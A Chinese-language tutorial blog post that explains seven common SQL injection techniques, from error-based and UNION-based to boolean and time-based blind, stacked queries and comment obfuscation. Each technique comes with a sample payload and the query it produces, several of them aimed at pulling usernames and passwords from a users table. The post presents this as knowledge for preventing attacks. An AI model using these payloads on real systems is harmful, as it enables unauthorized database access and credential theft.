系统安全-常见的几种sql注入攻击的方式

1.基于错误的注入

攻击者通过构造恶意的 SQL 语句,使得服务器返回错误信息,从而获取敏感信息。

例如,攻击者可以在登录页面的用户名和密码输入框中输入以下内容:

sql 复制代码
`' or 1=1--`

这将使 SQL 语句变为:

sql 复制代码
`SELECT * FROM users WHERE username = '' or 1=1--' AND password = ''`

其中,双破折号(--)表示注释掉后面的内容,所以这个 SQL 语句将会返回所有用户的信息,因为 1=1 总是成立的。

2.基于联合查询的注入

攻击者通过在注入点构造联合查询语句,获取数据库中的敏感信息。

例如,攻击者可以在搜索框中输入以下内容:

sql 复制代码
`' UNION SELECT username, password FROM users--`

这将使 SQL 语句变为:

sql 复制代码
`SELECT * FROM products WHERE name = '' UNION SELECT username, password FROM users--'`

其中,双破折号(--)表示注释掉后面的内容,所以这个 SQL 语句将会返回用户表中的用户名和密码信息。

3.基于布尔盲注的注入

基于布尔盲注的注入是一种常见的SQL注入攻击方式,攻击者通过构造恶意SQL语句,利用应用程序返回的布尔值(真或假)来推断数据库结构和相关信息。

例如,攻击者可以在搜索框或者输入框中输入以下内容:

sql 复制代码
`' AND (SELECT COUNT(*) FROM users WHERE username='admin' AND SUBSTR(password,1,1)='a')>0 AND '1'='1`

这将使 SQL 语句变为:

sql 复制代码
`SELECT * FROM products WHERE name = '' AND (SELECT COUNT(*) FROM users WHERE username='admin' AND SUBSTR(password,1,1)='a')>0 AND '1'='1`

上述SQL语句中,利用了SELECT COUNT(*)函数来查询数据库中是否存在用户名为admin且密码的首字母为字母a的记录。如果存在,则查询结果为真,否则为假。攻击者可以通过观察搜索页面的响应内容,来判断查询结果是真还是假,从而推断出数据库结构和相关信息。

4.基于时间盲注的注入

攻击者通过构造恶意的 SQL 语句,使得服务器在执行查询时延迟一段时间,从而获取敏感信息。

例如,攻击者可以在搜索框或者输入框中输入以下内容:

sql 复制代码
`' AND IF(SUBSTRING(database(),1,1)='M',sleep(10),0)--`

这将使 SQL 语句变为:

sql 复制代码
`SELECT * FROM products WHERE name = '' AND IF(SUBSTRING(database(),1,1)='M',sleep(10),0)--'`

上述SQL语句中,利用了IF函数和SUBSTR函数来判断数据库名称的首字母是否为字母M。如果是,就执行sleep(10)函数,即让数据库等待10秒钟,否则就执行0,即不等待。攻击者可以通过观察登录页面的响应时间来判断数据库名称的首字母是否为字母M,从而推断出数据库的结构和相关信息。

5.基于堆叠查询的注入

攻击者通过在注入点构造多个 SQL 查询语句,获取数据库中的敏感信息。

例如,攻击者可以在搜索框中输入以下内容:

sql 复制代码
`'; SELECT username, password FROM users;--`

这将使 SQL 语句变为:

sql 复制代码
`SELECT * FROM products WHERE name = ''; SELECT username, password FROM users;--'`

这个 SQL 语句将会返回用户表中的用户名和密码信息。

6.基于报错注入

攻击者通过构造恶意的 SQL 语句,使得服务器返回错误信息,从而获取敏感信息。

例如,攻击者可以在搜索框中输入以下内容:

sql 复制代码
`' AND (SELECT 1 FROM(SELECT COUNT(*),CONCAT(0x3a,@@version,0x3a,FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)--`

这将使 SQL 语句变为:

sql 复制代码
`SELECT * FROM products WHERE name = '' AND (SELECT 1 FROM(SELECT COUNT(*),CONCAT(0x3a,@@version,0x3a,FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)--'`

这个 SQL 语句将会返回服务器版本信息。

7.基于注释符号的注入

攻击者通过在注入点插入注释符号,使得恶意的 SQL 语句被忽略,从而获取敏感信息。

例如,攻击者可以在搜索框中输入以下内容:

sql 复制代码
`'/*abc*/ UNION /*def*/ SELECT /*ghi*/ username, password /*jkl*/ FROM /*mno*/ users/*pqr*/--`

这将使 SQL 语句变为:

sql 复制代码
`SELECT * FROM products WHERE name = ''/*abc*/ UNION /*def*/ SELECT /*ghi*/ username, password /*jkl*/ FROM /*mno*/ users/*pqr*/--'`

其中,所有以 /* 开头,以 */ 结尾的部分都被注释掉了,这个 SQL 语句将会返回用户表中的用户名和密码信息。

总结

学习好系统安全方面的知识,能让我更好的预防各种黑客的攻击,最基础风险的了解,非常必要。

相关推荐
yaoxin5211232 小时前
第三章 C 开头的术语
sql·iris
深圳讯鹏科技2 小时前
新能源工厂如何借助防静电手环监控系统保障生产安全
安全·防静电监控系统·esd防静电监控系统·防静电监控看板
GIS数据转换器2 小时前
城市生命线安全保障:技术应用与策略创新
大数据·人工智能·安全·3d·智慧城市
hao_wujing5 小时前
网络安全大模型和人工智能场景及应用理解
安全·web安全
Yeats_Liao6 小时前
Navicat 导出表结构后运行查询失败ERROR 1064 (42000): You have an error in your SQL syntax;
数据库·sql
Zda天天爱打卡11 小时前
【趣学SQL】第二章:高级查询技巧 2.2 子查询的高级用法——SQL世界的“俄罗斯套娃“艺术
数据库·sql
苏-言13 小时前
MyBatis最佳实践:动态 SQL
数据库·sql·mybatis
doubt。14 小时前
【BUUCTF】[RCTF2015]EasySQL1
网络·数据库·笔记·mysql·安全·web安全
廾匸070515 小时前
《2024年度网络安全漏洞威胁态势研究报告》
安全·web安全·网络安全·研究报告
winxp-pic18 小时前
视频行为分析系统,可做安全行为检测,比如周界入侵,打架
安全·音视频